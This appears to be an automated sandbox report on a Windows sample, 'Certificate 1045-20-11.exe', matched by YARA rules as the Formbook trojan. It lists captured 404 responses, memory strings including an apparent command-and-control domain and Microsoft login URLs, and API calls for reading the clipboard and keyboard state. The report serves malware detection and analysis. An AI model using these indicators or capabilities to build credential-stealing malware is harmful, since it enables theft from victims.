Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Thu, 21 Nov 2024 11:54:04 GMT | Connection: close | Content-Length: 315 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 11:55:58 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 11:56:01 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 11:56:03 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 11:56:06 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 11:56:13 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 11:56:15 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 11:56:18 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 11:56:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4168934011.0000000004B2D000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.empowermedeco.com
            Source: FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4168934011.0000000004B2D000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000003.00000002.4168533677.00000000047F2000.00000004.10000000.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.0000000003582000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000003.00000002.4168533677.00000000047F2000.00000004.10000000.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.0000000003582000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E87000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4165640004.0000000002E5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000003.00000003.2055053349.0000000007AAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000003.00000002.4168533677.0000000004E3A000.00000004.10000000.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.0000000003BCA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.empowermedeco.com/fo8o/?SHqP-p=mxnR
            Source: netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000003.00000002.4168533677.00000000044CE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4170196597.0000000006210000.00000004.00000800.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000325E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000325E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00896B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00896B0C
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00896D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00896D07
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00896B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00896B0C
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00882B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00882B37
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_008AF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_008AF7FF

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: This is a third-party compiled AutoIt script.0_2_00843D19
            Source: Certificate 1045-20-11.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Certificate 1045-20-11.exe, 00000000.00000000.1695638056.00000000008EE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_0f78d20b-c
